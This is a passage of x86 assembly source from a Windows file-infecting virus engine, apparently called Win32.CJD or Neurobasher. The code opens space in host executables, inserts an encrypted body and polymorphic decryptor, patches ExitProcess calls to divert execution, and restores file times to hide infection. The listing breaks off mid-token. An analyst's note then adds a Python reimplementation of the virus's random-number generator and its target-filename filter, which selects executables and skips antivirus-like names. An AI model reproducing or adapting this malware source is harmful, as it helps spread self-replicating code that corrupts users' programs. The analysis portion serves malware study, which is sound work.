        mov eax, [ebp+SizeOfExpansion]
        cmp eax, 2
        jz @@InsertExitProcess
        add eax, 1
        mov [ebp+SizeOfExpansion], eax
        jmp @@CheckWithOtherSizeOfExpansion
@@InsertExitProcess:                    ; no decryptor fitted: write "push 0 / call [ExitProcess]" into the hole
        mov edi, [ebp+Phys_TextHole]
        add edi, [ebp+MappingAddress]
        mov eax, 6Ah
        mov [edi], eax
        add edi, 2
        mov eax, 15FFh
        mov [edi], eax
        add edi, 2
        mov eax, [ebp+ExitProcessAddress]
        mov [edi], eax
        jmp @@Exit
@@SizeOfDecryptorOK:
        mov esi, [ebp+AssembledDecryptor]
        mov edi, [ebp+Phys_TextHole]
        add edi, [ebp+MappingAddress]
        mov ecx, [ebp+SizeOfDecryptor]
@@LoopCopyDecryptor:
        mov eax, [esi]
        mov [edi], eax
        add esi, 1
        add edi, 1
        dec ecx
        or ecx, ecx
        jnz @@LoopCopyDecryptor
        mov edx, 30h
        mov esi, [ebp+MaxSizeOfDecryptor]
        sub esi, [ebp+SizeOfDecryptor]
        and esi, 0FFFFFFFCh
        or esi, esi
        jz @@ContinueWithTheRest
@@CheckAgainThePossibility:
        call Random
        and eax, 0FCh
        or eax, eax
        jz @@CheckAgainThePossibility
        sub edx, 1
        cmp eax, esi
        jb @@FillRandomBytes
        or edx, edx
        jnz @@CheckAgainThePossibility
        jmp @@ContinueWithTheRest
@@FillRandomBytes:
        mov ecx, eax
@@LoopFillRandomBytes:
        call Random
        mov [edi], eax
        add edi, 4
        sub ecx, 4
        or ecx, ecx
        jnz @@LoopFillRandomBytes
@@ContinueWithTheRest:
        mov edi, [ebp+MappingAddress]
        add edi, [ebp+Phys_DataHole]
        cmp edi, [ebp+MappingAddress]
        jz @@Exit
        mov edx, [ebp+TypeOfEncryption]
        mov ebx, [ebp+EncryptionKey]
        mov esi, [ebp+NewAssembledCode]
        mov ecx, [ebp+SizeOfNewCode]
        and ecx, 0FFFFFFFCh
        add ecx, 4
@@LoopEncryptCode:                      ; dword-wise XOR / ADD / SUB with a single key (0 = plaintext)
        mov eax, [esi]
        or ebx, ebx
        jz @@NoEncryption
        or edx, edx
        jz @@ADDKey
        cmp edx, 1
        jz @@SUBKey
@@XORKey:
        xor eax, ebx
        jmp @@StoreDWORD
@@ADDKey:
        add eax, ebx
        jmp @@StoreDWORD
@@SUBKey:
        sub eax, ebx
@@NoEncryption:
@@StoreDWORD:
        mov [edi], eax
        add esi, 4
        add edi, 4
        sub ecx, 4
        or ecx, ecx
        jnz @@LoopEncryptCode
        xor eax, eax
        mov [edi], eax
@@Exit:
        mov ebx, [ebp+HeaderAddress]
        call Random
        and eax, 0FFFFFCh
        mov [ebx+58h], eax              ; random non-zero CheckSum = infection marker
        xor edi, edi
        jmp @@NoError
@@Error4:
        call UndoChanges
        mov edi, 1
@@NoError:
        push eax
        push ecx
        push edx
        mov eax, [ebp+MappingAddress]
        push eax
        call dword ptr [ebp+RVA_UnmapViewOfFile]
        pop edx
        pop ecx
        pop eax
        jmp @@NoError3
@@Error3:
        mov edi, 1
@@NoError3:
        push eax
        push ecx
        push edx
        mov eax, [ebp+hMapping]
        push eax
        call dword ptr [ebp+RVA_CloseHandle]
        pop edx
        pop ecx
        pop eax
        jmp @@NoError2
@@Error2:
        mov edi, 1
@@NoError2:
        push eax
        push ecx
        push edx
        xor eax, eax
        push eax
        push eax
        or edi, edi
        jnz @@ThereWasAnError
        mov eax, [ebp+FileSize]
        jmp @@FixSize
@@ThereWasAnError:
        mov eax, [ebp+OriginalFileSize]
@@FixSize:
        push eax
        mov eax, [ebp+hFile]
        push eax
        call dword ptr [ebp+RVA_SetFilePointer]
        pop edx
        pop ecx
        pop eax
        push eax
        push ecx
        push edx
        mov eax, [ebp+hFile]
        push eax
        call dword ptr [ebp+RVA_SetEndOfFile]
        pop edx
        pop ecx
        pop eax
@@DontFixSize:
        push eax
        push ecx
        push edx
        mov eax, [ebp+FindFileData]
        add eax, 14h                    ; ftLastWriteTime
        push eax
        sub eax, 8                      ; ftLastAccessTime
        push eax
        sub eax, 8                      ; ftCreationTime
        push eax
        mov eax, [ebp+hFile]
        push eax
        call dword ptr [ebp+RVA_SetFileTime]
        pop edx
        pop ecx
        pop eax
        push eax
        push ecx
        push edx
        mov eax, [ebp+hFile]
        push eax
        call dword ptr [ebp+RVA_CloseHandle]
        pop edx
        pop ecx
        pop eax
@@Error:
        push eax
        push ecx
        push edx
        mov eax, [ebp+FileAttributes]
        push eax
        mov eax, [ebp+Addr_FilePath]
        push eax
        call dword ptr [ebp+RVA_SetFileAttributesA]
        pop edx
        pop ecx
        pop eax
@@Error_:
        ret
TouchFile endp

; eax = RVA of an array of edx RVAs; every entry at or above edi is shifted by ecx.
UpdateArrayOfRVAs proc
        or eax, eax
        jz @@UpdateArray_OK
        or edx, edx
        jz @@UpdateArray_OK
        push ebx
        mov ebx, eax
        call TranslateVirtualToPhysical
        mov eax, ebx
        pop ebx
        or eax, eax
        jz @@UpdateArray_Updated01
@@UpdateArrayLoop_01:
        cmp [eax], edi
        jb @@UpdateArray_Updated01
        add [eax], ecx
@@UpdateArray_Updated01:
        add eax, 4
        dec edx
        or edx, edx
        jnz @@UpdateArrayLoop_01
@@UpdateArray_OK:
        ret
UpdateArrayOfRVAs endp

; Shift every RVA / file offset that lies beyond the hole being opened (edi = RVA
; boundary, ecx = hole size, esi = section header the hole goes into) in the
; resource, import and export directories, the relocation records, the optional
; header, the data directories and the section table; MakingFirstHole selects the
; text-hole variant. For a data hole the raw file contents are also moved up.
UpdateHeaders proc
        push ecx
        mov eax, [ebp+MakingFirstHole]
        or eax, eax
        jz @@MakingDataHole
        mov eax, [esi+10h]
        cmp eax, [esi+08h]
        jbe @@TextSizeOK
        mov [esi+08h], eax
@@TextSizeOK:
        mov edi, [esi+0Ch]
        add edi, [esi+10h]
        push edi
        mov eax, [esi+14h]
        add eax, [esi+10h]
        push eax
        jmp @@BeginUpdates
@@MakingDataHole:
        mov edi, [esi+0Ch]
        push edi
        mov eax, [esi+14h]
        push eax
@@BeginUpdates:
@@UpdateResources:
        mov eax, [ebp+HeaderAddress]
        mov ebx, [eax+88h]              ; resource directory RVA
        or ebx, ebx
        jz @@UpdateImports
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@End
        mov eax, [ebx+0Ch]
        and eax, 0FFFFh
        mov edx, [ebx+0Eh]
        and edx, 0FFFFh
        add edx, eax
        or edx, edx
        jz @@UpdateImports
        mov eax, ebx
        add eax, 10h
        call UpdateResourceDir
@@UpdateImports:
        call UpdateImports
        mov eax, [ebp+GetModuleHandleAddress]
        or eax, eax
        jz @@End
        mov eax, [ebp+GetProcAddressAddress]
        or eax, eax
        jz @@End
        mov eax, [ebp+ExitProcessAddress]
        or eax, eax
        jz @@End
@@UpdateExports:
        mov eax, [ebp+HeaderAddress]
        mov ebx, [eax+78h]              ; export directory RVA
        or ebx, ebx
        jz @@ExportsUpdated
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@ExportsUpdated
        mov eax, [ebx+0Ch]
        cmp eax, edi
        jb @@UpdateExportsOK_01
        add [ebx+0Ch], ecx
@@UpdateExportsOK_01:
        mov eax, [ebx+1Ch]
        mov edx, [ebx+14h]
        call UpdateArrayOfRVAs
        mov eax, [ebx+1Ch]
        cmp eax, edi
        jb @@UpdateExportsOK_02
        add [ebx+1Ch], ecx
@@UpdateExportsOK_02:
        mov eax, [ebx+20h]
        mov edx, [ebx+18h]
        call UpdateArrayOfRVAs
        mov eax, [ebx+20h]
        cmp eax, edi
        jb @@UpdateExportsOK_03
        add [ebx+20h], ecx
@@UpdateExportsOK_03:
@@ExportsUpdated:
@@UpdateCodeSection:
        push esi
        mov eax, [ebp+RelocHeader]
        mov eax, [eax+14h]
        add eax, [ebp+MappingAddress]
@@LoopUpdate_00:                        ; walk the relocation blocks and fix every HIGHLOW target
        mov esi, [eax]
        or esi, esi
        jz @@AllUpdated
        mov edx, 8
@@LoopUpdate_01:
        cmp edx, [eax+4]
        jae @@PageUpdated
        add eax, edx
        mov ebx, [eax]
        sub eax, edx
        and ebx, 0FFFFh
        add edx, 2
        cmp ebx, 2FFFh
        jbe @@LoopUpdate_01
        and ebx, 0FFFh
        add ebx, [eax]
        mov esi, [ebp+MakingFirstHole]
        or esi, esi
        jnz @@UpdateCodeSec_Cont00
        cmp ebx, [ebp+RVA_TextHole]
        jb @@UpdateCodeSec_Cont00
        add ebx, [ebp+TextHoleSize]
@@UpdateCodeSec_Cont00:
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@LoopUpdate_01
        push eax
        push edx
        mov eax, [ebp+HeaderAddress]
        mov edx, [ebx]
        sub edx, [eax+34h]
        cmp edx, edi
        jb @@TranslateOK_02
        add [ebx], ecx
        add edx, ecx
@@TranslateOK_02:
        mov esi, [ebx-2]
        and esi, 0FFFFh
        cmp esi, 15FFh
        jz @@CheckExitProcess
        cmp esi, 25FFh
        jnz @@ItsNotExitProcess
@@CheckExitProcess:
        cmp edx, [ebp+ExitProcessAddress]
        jnz @@ItsNotExitProcess
        mov edx, [ebp+HeaderAddress]
        mov edx, [edx+34h]
        add edx, edi
        push esi
        mov esi, ebx
        call PatchExitProcess
        pop esi
        xor eax, eax
        pop edx
        pop eax
        push eax
        add eax, edx
        push edx
        mov edx, [eax-2]
        and edx, 0FFFF0000h
        mov [eax-2], edx
        pop edx
        pop eax
        jmp @@LoopUpdate_01
@@ItsNotExitProcess:
@@TranslateOK:
        pop edx
        pop eax
        jmp @@LoopUpdate_01
@@PageUpdated:
        add eax, [eax+4]
        jmp @@LoopUpdate_00
@@AllUpdated:
        pop esi
        mov eax, [ebp+MakingFirstHole]
        mov ebx, [ebp+HeaderAddress]
        cmp [ebx+0Ch], edi              ; BaseOfCode
        jb @@Fixed_01
        or eax, eax
        jnz @@NotFixed_01
        cmp [ebx+0Ch], edi
        jz @@Fixed_01
@@NotFixed_01:
        add [ebx+0Ch], ecx
@@Fixed_01:
        cmp [ebx+28h], edi              ; AddressOfEntryPoint
        jb @@Fixed_02
        or eax, eax
        jnz @@NotFixed_02
        cmp [ebx+28h], edi
        jz @@Fixed_02
@@NotFixed_02:
        add [ebx+28h], ecx
@@Fixed_02:
        cmp [ebx+2Ch], edi              ; BaseOfCode
        jb @@Fixed_03
        or eax, eax
        jnz @@NotFixed_03
        cmp [ebx+2Ch], edi
        jz @@Fixed_03
@@NotFixed_03:
        add [ebx+2Ch], ecx
@@Fixed_03:
        cmp [ebx+30h], edi              ; BaseOfData
        jb @@Fixed_04
        or eax, eax
        jnz @@NotFixed_04
        cmp [ebx+30h], edi
        jz @@Fixed_04
@@NotFixed_04:
        add [ebx+30h], ecx
@@Fixed_04:
        add [ebx+50h], ecx              ; SizeOfImage
        mov edx, [ebp+HeaderAddress]
        mov edx, [edx+74h]              ; NumberOfRvaAndSizes
        mov ebx, [ebp+HeaderAddress]
        add ebx, 78h
        xor eax, eax
@@LoopDir_01:
        cmp eax, 4
        jz @@NextDir_01                 ; directory 4 (security) is a file offset, leave it alone
        cmp [ebx], edi
        jb @@NextDir_01
        add [ebx], ecx
@@NextDir_01:
        add ebx, 8
        inc eax
        dec edx
        or edx, edx
        jnz @@LoopDir_01
        mov edx, [ebp+StartOfSectionHeaders]
        mov ebx, [esi+14h]
        mov eax, [ebp+MakingFirstHole]
        or eax, eax
        jz @@MakingDataHole_2
@@MakingCodeHole_2:
        add ebx, [esi+10h]
@@MakingDataHole_2:
        mov eax, [ebp+HeaderAddress]
        mov eax, [eax+6]
        and eax, 0FFFFh
        push esi
        mov esi, [ebp+MakingFirstHole]
@@LoopUpdate_02:
        push eax
        mov eax, [edx+14h]
        cmp eax, ebx
        jb @@NextSection_00
        or esi, esi
        jnz @@NextSection_00_
        cmp eax, ebx
        jz @@NextSection_00
@@NextSection_00_:
        add eax, ecx
        mov [edx+14h], eax
@@NextSection_00:
        mov eax, [edx+0Ch]
        cmp eax, edi
        jb @@NextSection_01
        or esi, esi
        jnz @@NextSection_01_
        cmp eax, edi
        jz @@NextSection_01
@@NextSection_01_:
        add eax, ecx
        mov [edx+0Ch], eax
@@NextSection_01:
        pop eax
        add edx, 28h
        dec eax
        or eax, eax
        jnz @@LoopUpdate_02
        pop esi
        add [esi+08h], ecx
        add [esi+10h], ecx
        cmp esi, [ebp+RelocHeader]
        jz @@End
        push ecx
        push ebx
        mov edx, [ebp+MappingAddress]
        add edx, [ebp+FileSize]
        sub edx, 4
        mov edi, edx
        add edi, ecx
        pop ecx
        add ecx, [ebp+MappingAddress]
@@Again:                                ; move the file tail up by the hole size
        mov eax, [edx]
        mov [edi], eax
        sub edx, 4
        sub edi, 4
        cmp edx, ecx
        jae @@Again
        pop ecx
        and ecx, 0FFFFFFFCh
        shr ecx, 2
        add edx, 4
@@Again2:                               ; fill the hole with random dwords
        call Random
        and eax, 0FCh
        mov [edx], eax
        add edx, 4
        dec ecx
        or ecx, ecx
        jnz @@Again2
@@End:
        pop eax
        pop edi
        mov ecx, 0
        pop ecx
        ret
UpdateHeaders endp

; Recursive walk of the resource tree (ebx = mapped base of the resource directory);
; every data entry whose RVA lies beyond edi is shifted by ecx.
UpdateResourceDir proc
@@UpdateResourceDir2:
        push eax
        mov eax, [eax+4]
        and eax, 80000000h
        or eax, eax
        jz @@UpdateData
        pop eax
        push eax
        mov eax, [eax+4]
        and eax, 7FFFFFFFh
        add eax, ebx
        push edx
        push eax
        mov edx, [eax+0Ch]
        and edx, 0FFFFh
        mov eax, [eax+0Eh]
        and eax, 0FFFFh
        add edx, eax
        pop eax
        add eax, 10h
        call @@UpdateResourceDir2
        pop edx
        jmp @@NextDir
@@UpdateData:
        pop eax
        push eax
        mov eax, [eax+4]
        add eax, ebx
        mov eax, [eax]
        cmp eax, edi
        jb @@UpdateOK
        pop eax
        push eax
        mov eax, [eax+4]
        add eax, ebx
        push ebx
        mov ebx, eax
        call AddUndoAction
        pop ebx
        add [eax], ecx
@@UpdateOK:
@@NextDir:
        pop eax
        add eax, 8
        dec edx
        or edx, edx
        jnz @@UpdateResourceDir2
        ret
UpdateResourceDir endp

; ebx = RVA -> address inside the mapping (via the section table), or 0 if the RVA
; falls in no section.
TranslateVirtualToPhysical proc
        push ecx
        or ebx, ebx
        jz @@Error
        mov ecx, [ebp+HeaderAddress]
        mov ecx, [ecx+6]
        and ecx, 0FFFFh
        push edx
        mov edx, [ebp+StartOfSectionHeaders]
        push eax
@@LoopSection:
        mov eax, [edx+0Ch]
        cmp ebx, eax
        jb @@NextSection
        add eax, [edx+10h]
        cmp ebx, eax
        jae @@NextSection
        sub ebx, [edx+0Ch]
        add ebx, [edx+14h]
        pop eax
        pop edx
        add ebx, [ebp+MappingAddress]
        pop ecx
        ret
@@NextSection:
        add edx, 28h
        dec ecx
        or ecx, ecx
        jnz @@LoopSection
        pop eax
        pop edx
@@Error:
        xor ebx, ebx
        pop ecx
        ret
TranslateVirtualToPhysical endp

; Walk the import directory, shifting RVAs beyond edi by ecx. For the KERNEL32
; descriptor the hint/name entries are matched to record the IAT slots of
; VirtualAlloc, GetProcAddress, ExitProcess and GetModuleHandleA/W.
UpdateImports proc
        push esi
        mov eax, [ebp+HeaderAddress]
        mov ebx, [eax+80h]              ; import directory RVA
        or ebx, ebx
        jz @@ImportsUpdated
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@ImportsUpdated
@@UpdateImports_Loop00:
        mov eax, [ebx+0Ch]              ; Name
        or eax, eax
        jz @@ImportsUpdated
        cmp eax, edi
        jb @@UpdateImportsOK_01
        add ebx, 0Ch
        call AddUndoAction
        add [ebx], ecx
        sub ebx, 0Ch
@@UpdateImportsOK_01:
        push ebx
        xor ebx, ebx
        mov [ebp+Kernel32Imports], ebx
        mov ebx, eax
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@UpdateImports_Next00
        mov eax, [ebx]
        and eax, 1F1F1F1Fh
        cmp eax, 'nrek' AND 1F1F1F1Fh
        jnz @@UpdateImports_Next00
        mov eax, [ebx+4]
        and eax, 0FFFF1F1Fh
        cmp eax, '23le' AND 0FFFF1F1Fh
        jnz @@UpdateImports_Next00
        mov eax, 1
        mov [ebp+Kernel32Imports], eax
@@UpdateImports_Next00:
        pop ebx
        mov eax, [ebx]                  ; OriginalFirstThunk
        or eax, eax
        jz @@UpdateImportsOK_04
        push ebx
        mov ebx, eax
        call TranslateVirtualToPhysical
        mov eax, ebx
        pop ebx
        or eax, eax
        jz @@UpdateImportsOK_04
@@UpdateImports_Loop01:
        mov edx, [eax]
        or edx, edx
        jz @@UpdateImportsOK_02
        cmp edx, 80000000h              ; import by ordinal
        jae @@UpdateImports_UpdatedOK
        mov esi, [ebp+Kernel32Imports]
        or esi, esi
        jz @@UpdateImports_NotKernel32
        push ebx
        mov ebx, edx
        call TranslateVirtualToPhysical
        or ebx, ebx
        jz @@UpdateImports_UnknownFunction
        mov esi, [ebx+2]                ; name follows the 2-byte hint
        cmp esi, 'tixE'
        jz @@UpdateImports_ExitProcess00
        cmp esi, 'MteG'
        jz @@UpdateImports_GetModuleHandle00
        cmp esi, 'PteG'
        jz @@UpdateImports_GetProcAddress00
        cmp esi, 'triV'
        jnz @@UpdateImports_UnknownFunction
@@UpdateImports_VirtualAlloc:
        mov esi, [ebx+0Bh]
        cmp esi, 'loc'
        jnz @@UpdateImports_UnknownFunction
        xor esi, esi
        jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_GetProcAddress00:
        mov esi, [ebx+6]
        cmp esi, 'Acor'
        jnz @@UpdateImports_UnknownFunction
        mov esi, 1
        jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_ExitProcess00:
        mov esi, [ebx+6]
        cmp esi, 'corP'
        jnz @@UpdateImports_UnknownFunction
        mov esi, 2
        jmp @@UpdateImports_SaveFunctionAddress
@@UpdateImports_GetModuleHandle00:
        mov esi, [ebx+0Ah]
        cmp esi, 'naHe'
        jnz @@UpdateImports_UnknownFunction
        mov esi, [ebx+0Eh]
        cmp esi, 'Aeld'
        jz @@UpdateImports_GetModuleHandleAFound
        cmp esi, 'Weld'
        jnz @@UpdateImports_UnknownFunction
        mov esi, 1
        jmp @@UpdateImports_GetModuleHandleFound
@@UpdateImports_GetModuleHandleAFound:
        xor esi, esi
@@UpdateImports_GetModuleHandleFound:
        mov [ebp+GetModuleHandleMode], esi
        mov esi, 3
@@UpdateImports_SaveFunctionAddress:    ; IAT slot RVA = FirstThunk + offset of this thunk entry
        pop ebx
        push ebx
        push eax
        push ebx
        mov ebx, [ebx]
        call TranslateVirtualToPhysical
        sub eax, ebx
        pop ebx
        add eax, [ebx+10h]
        cmp eax, edi
        jb @@UpdateImports_SetFunctionAddress
        add eax, ecx
@@UpdateImports_SetFunctionAddress:
        or esi, esi
        jz @@UpdateImports_SetVirtualAlloc
        cmp esi, 1
        jz @@UpdateImports_SetGetProcAddress
        cmp esi, 2
        jz @@UpdateImports_SetExitProcess
@@UpdateImports_SetGetModuleHandle:
        mov [ebp+GetModuleHandleAddress], eax
        jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetVirtualAlloc:
        mov [ebp+VirtualAllocAddress], eax
        jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetGetProcAddress:
        mov [ebp+GetProcAddressAddress], eax
        jmp @@UpdateImports_FunctionSet
@@UpdateImports_SetExitProcess:
        mov [ebp+ExitProcessAddress], eax
@@UpdateImports_FunctionSet:
        pop eax
@@UpdateImports_UnknownFunction:
@@UpdateImports_Continue00:
        pop ebx
@@UpdateImports_NotKernel32:
        cmp edx, edi
        jb @@UpdateImports_UpdatedOK
        push ebx
        mov ebx, eax
        call AddUndoAction
        pop ebx
        add [eax], ecx
@@UpdateImports_UpdatedOK:
        add eax, 4
        jmp @@UpdateImports_Loop01
@@UpdateImportsOK_02:
        mov eax, [ebx]
        cmp eax, edi
        jb @@UpdateImportsOK_03
        call AddUndoAction
        add [ebx], ecx
@@UpdateImportsOK_03:
        add ebx, 10h                    ; FirstThunk
        mov eax, [ebx]
        cmp eax, edi
        jb @@UpdateImportsOK_04_
        call AddUndoAction
        add eax, ecx
        mov [ebx], eax
        sub eax, ecx
@@UpdateImportsOK_04_:
        sub ebx, 10h
@@UpdateImportsOK_04:
        add ebx, 14h                    ; next IMAGE_IMPORT_DESCRIPTOR
        jmp @@UpdateImports_Loop00
@@ImportsUpdated:
        pop esi
        ret
UpdateImports endp

; Redirect a `call/jmp [ExitProcess]` found in the host (esi -> its disp32, edx =
; new target). Either the six bytes become `push imm32 / ret` (68 .. C3), or a dword
; of CCh padding inside .text is found, the target is stored there, and the
; instruction is turned into `jmp [hole]` (FF 25); if a ret already follows the
; call, FF 35 (push [mem]) is written instead.
PatchExitProcess proc
        push eax
        mov eax, 1
        call Random
        and eax, 1
        jz @@PUSHRET
@@IndirectDisplacement:
        push ecx
        mov eax, [ebp+TextHeader]
        mov ecx, [eax+10h]
        mov eax, [eax+14h]
        add eax, [ebp+MappingAddress]
        push edx
        sub ecx, 4
@@LoopFindHole:
        sub ecx, 1
        or ecx, ecx
        jz @@NotFound
        mov edx, [eax]
        cmp edx, 0CCCCCCCCh
        jz @@HoleFound
        add eax, 1
        jmp @@LoopFindHole
@@NotFound:
        pop edx
        pop ecx
        jmp @@PUSHRET
@@HoleFound:
        pop edx
        mov [eax], edx
        mov ecx, [esi+4]
        and ecx, 0FFh
        cmp ecx, 0C3h
        jz @@RetInserted
        sub eax, [ebp+MappingAddress]
        mov ecx, [ebp+TextHeader]
        sub eax, [ecx+14h]
        add eax, [ecx+0Ch]
        mov ecx, [ebp+HeaderAddress]
        add eax, [ecx+34h]
        mov [esi], eax
        mov eax, 25h
        mov [esi-1], al
        pop ecx
        jmp @@Return
@@RetInserted:
        mov eax, 35h
        mov [esi-1], al
        pop ecx
        jmp @@Return
@@PUSHRET:
        mov eax, 68h
        mov [esi-2], eax
        mov [esi-1], edx
        mov eax, 0C3h
        mov [esi+3], al
@@Return:
        pop eax
        ret
PatchExitProcess endp

; While MakingFirstHole is set, log (address, old value) pairs in OtherBuffers so
; UndoChanges can replay them in reverse if the infection is abandoned.
AddUndoAction proc
        push edx
        mov edx, [ebp+MakingFirstHole]
        or edx, edx
        jz @@Return
        push eax
        mov edx, [ebp+NumberOfUndoActions]
        add edx, [ebp+OtherBuffers]
        mov [edx], ebx
        mov eax, [ebx]
        mov [edx+4], eax
        add edx, 8
        sub edx, [ebp+OtherBuffers]
        mov [ebp+NumberOfUndoActions], edx
        pop eax
@@Return:
        pop edx
        ret
AddUndoAction endp

UndoChanges proc
        mov edx, [ebp+NumberOfUndoActions]
        or edx, edx
        jz @@Ret
        mov ecx, edx
        sub edx, 8
        add edx, [ebp+OtherBuffers]
@@Loop01:
        mov ebx, [edx]
        mov eax, [edx+4]
        mov [ebx], eax
        sub edx, 8
        sub ecx, 8
        or ecx, ecx
        jnz @@Loop01
@@Ret:
        ret
UndoChanges endp

; GetModuleHandle wrapper; when FlagAorW is set the ASCII name at edx is widened in
; place (from the end backwards) for the W variant.
APICall_GetModuleHandle proc
        mov eax, [ebp+FlagAorW]
        or eax, eax
        jz @@UseGMHA
        mov ebx, edx
        add ebx, 20h
        mov ebx, edx
        add ecx, 10h
@@LoopConvertToWideChar:
        mov eax, [ecx]
        and eax, 0FFh
        mov [ebx], eax
        sub ecx, 1
        sub ebx, 2
        cmp ecx, edx
        jnz @@LoopConvertToWideChar
@@UseGMHA:
        push edx
        call dword ptr [ebp+RVA_GetModuleHandle]
        mov [ebp+ReturnValue], eax
        ret
APICall_GetModuleHandle endp

GetFunction proc
        push eax
        push ecx
        push edx
        mov eax, edx
        push eax
        mov eax, edi
        push eax
        call dword ptr [ebp+RVA_GetProcAddress]
        mov [ebp+ReturnValue], eax
        pop edx
        pop ecx
        pop eax
        mov eax, [ebp+ReturnValue]
        ret
GetFunction endp

;----------------------------------------------------------------------------------------

MakeDecryptor proc
        mov [ebp+InstructionTable], edi
        xor eax, eax
        mov [ebp+NumberOfLabels], eax
        mov [ebp+NumberOfVariables], eax
        mov eax, edi
        add eax, 80000h
        mov [ebp+ExpansionResult], eax
        mov eax, [ebp+RVA_DataHole]
        mov ecx, [ebp+HeaderAddress]
        add eax, [ecx+34h]
        mov [ebp+StartOfEncryptedData], eax
        mov edx, [ebp+Relo
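Two pieces of the engine above are worth reproducing exactly when analysing a sample: the PRNG (Random, RandomMod1, RandomMod2), because every layout and encryption decision is drawn from it, and the file-name filter in InfectFiles2 (@@TryToInfectFile through @@CheckExtension), because its 1Fh mask makes the set of attacked names wider and stranger than "case-insensitive .EXE". The Python below is an added analyst's transcription of those two routines, not part of Neurobasher's source. It assumes MASM's byte order for multi-character constants ('EXE.' is the bytes ".EXE" in memory), that cFileName is NUL-terminated, and, where the original would read the four bytes in front of the name because the scan stopped inside the first four characters, it treats the name as not matching (an assumption, marked in the code). The random 50% skip (`and eax, 1`) that precedes the filter is left out so the result is deterministic. The sample names are constructed.

```python
"""Analyst's reimplementation of two routines of the Win32.CJD engine listed
above (added example, not the author's code): the Random PRNG and the
file-name filter of InfectFiles2.  Reproduces the logic for analysis only."""

MASK32 = 0xFFFFFFFF


def rotr32(x, n):
    """32-bit rotate right.  RandomMod1 (n=13) and RandomMod2 (n=17) build
    exactly this from and/shl/shr/or before adding ecx."""
    x &= MASK32
    return ((x >> n) | (x << (32 - n))) & MASK32


class CjdRandom:
    """The Random proc: two 32-bit seeds (RndSeed1, RndSeed2), both updated per call."""

    def __init__(self, seed1, seed2):
        self.seed1 = seed1 & MASK32
        self.seed2 = seed2 & MASK32

    def next(self):
        # mov eax,seed1 / mov ecx,seed2 / add eax,ecx / call RandomMod1
        eax = (rotr32((self.seed1 + self.seed2) & MASK32, 13) + self.seed2) & MASK32
        # xor eax,seed1 / mov seed1,eax / mov ecx,eax
        self.seed1 ^= eax
        ecx = self.seed1
        # mov eax,seed2 / add seed2,ecx / call RandomMod2 / xor eax,seed2 / mov seed2,eax
        old_seed2 = self.seed2
        self.seed2 = (self.seed2 + ecx) & MASK32
        eax = (rotr32(old_seed2, 17) + ecx) & MASK32
        self.seed2 ^= eax
        # xor eax,seed1 / call RandomMod2   (ecx still holds the new seed1)
        return (rotr32(self.seed2 ^ self.seed1, 17) + ecx) & MASK32


CHAR_MASK = 0x1F  # the AND 1Fh / 1F1Fh / 1F1F1F1Fh applied before every name compare


def fold(bs):
    """The engine's per-byte 1Fh mask: folds case, but also maps e.g. '8' onto 'X'."""
    return bytes(b & CHAR_MASK for b in bs)


SKIP_ANTI = fold(b"anti")                                    # 'itna' AND 1F1F1F1Fh
SKIP_PREFIXES = {fold(p) for p in (b"F-", b"PA", b"SC", b"DR", b"NO", b"IE", b"EX", b"WO")}
TARGET_EXTS = {fold(e) for e in (b"EXE", b"SCR", b"DAT", b"OVL", b"CPL")}
V_FOLDED = ord("V") & CHAR_MASK                              # 'V' AND 1Fh


def is_target_name(name):
    """True if InfectFiles2 would call TouchFile for this cFileName (bytes, no NUL)."""
    buf = name + b"\0"                         # cFileName is NUL-terminated
    if fold(buf[:4]) == SKIP_ANTI:             # cmp eax, 'itna' AND 1F1F1F1Fh
        return False
    if fold(buf[:2]) in SKIP_PREFIXES:         # the eight 'xx' AND 1F1Fh compares
        return False
    # @@LoopFindExtension: stop at the first byte whose masked value is 0 (NUL,
    # but also ' ', '@' and '`'); a V/v-class byte before that rejects the name.
    i = 0
    while True:
        b = buf[i] & CHAR_MASK
        if b == V_FOLDED:
            return False
        if b == 0:
            break
        i += 1
    # @@CheckExtension: dword at [ebx-4] masked with 1F1F1FFFh ('.' compared exactly)
    if i < 4:
        return False  # assumption: the original reads the bytes before cFileName here
    tail = buf[i - 4:i]
    return tail[0:1] == b"." and fold(tail[1:]) in TARGET_EXTS
```

Two consequences of the mask are visible in the tests: `notepad.exe` is never touched because its first two characters fold to the same values as "NO", and `foo.e8e` is touched because '8' and 'X' agree in their low five bits.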